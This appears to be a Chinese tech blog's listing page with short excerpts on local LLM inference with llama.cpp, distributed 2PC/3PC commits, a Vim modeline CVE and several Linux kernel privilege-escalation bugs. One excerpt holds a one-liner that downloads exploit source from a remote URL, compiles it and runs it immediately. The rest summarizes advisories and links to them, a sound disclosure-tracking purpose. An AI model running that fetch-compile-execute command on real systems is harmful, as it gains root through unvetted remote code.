2026/5/24大约 1 分钟
示例项目
集成/测试的 Demo 代码
变更日志
站点特性变更记录
Qwen3.6-35B-A3B是开源混合架构模型(不是传统稠密模型)每次激活只需3B(而不是总的35B)参数量同时进入显存。
一般35B大模型需要24G才能运行。
llama.cpp的CPU Offload模式通过MoE(混合专家):
- 由显卡GPU负责注意力层。
- 由内存负责专家层(Expert Layers)
实现CPU加CPU的混合推理。 支持N卡、A卡、I卡和纯CPU运行。
安装
2026/5/24大约 4 分钟
本地提权(LPE)
写入复制(COW)竞争条件 通过 /proc/self/mem 写入导致自读文件被脏页污染
2026/5/23小于 1 分钟
本地提权(LPE)
pipe buffer 标识位未初始化 可将数据直接写入自读文件的 Page Cache
2026/5/23小于 1 分钟
21天内被ai发现的第4个linux内核本地提权漏洞。
跟dirtyfrag属于同一类问题,即复写页面缓存实现提权。
之前:
- CVE-2026-31431: Copy Fail
- CVE-2026-43284: Dirty Frag
- CVE-2026-43500: Dirty Frag
- CVE-2026-46300: Fragnesia
POC:
2026/5/23大约 13 分钟
跟dirtyfrag属于同一类问题
报告:
POC:
- https://www.openwall.com/lists/oss-security/2026/05/13/3/1
curl -sSL https://www.openwall.com/lists/oss-security/2026/05/13/3/1 | gcc -x c -O0 -Wall -o exp - -lutil && ./exp - https://github.com/v12-security/pocs/tree/main/fragnesia-5db89c99566fc
2026/5/23大约 15 分钟
2026/5/23小于 1 分钟
3pc是对两阶段提交(2PC)的改良版,试图解决前任的同步阻塞问题和单点故障死锁问题。
3pc做了两点核心改进:
- 拆分阶段 —— 将2PC的准备阶段一分为二,变成了 CanCommit、PreCommit 和 DoCommit 三个阶段。
- 引入超时机制 —— 同时在协调者和参与者端都引入了超时机制(2PC只有协调者有超时机制)。
2026/5/17大约 2 分钟
2PC将分布式事务的提交过程分为两个角色和两个阶段。
2026/5/17大约 2 分钟
立即升级到 9.2.0276 + 并关闭 modeline 模块。 (修复提交:664701e)
信息整理:
- github security 披露: https://github.com/vim/vim/security/advisories/GHSA-2gmj-rpqf-pxvh
- 漏洞披露: https://nvd.nist.gov/vuln/detail/CVE-2026-34714
- https://www.openwall.com/lists/oss-security/2026/03/30/3
- https://app.opencve.io/cve/CVE-2026-34714
POC:
2026/5/17大约 2 分钟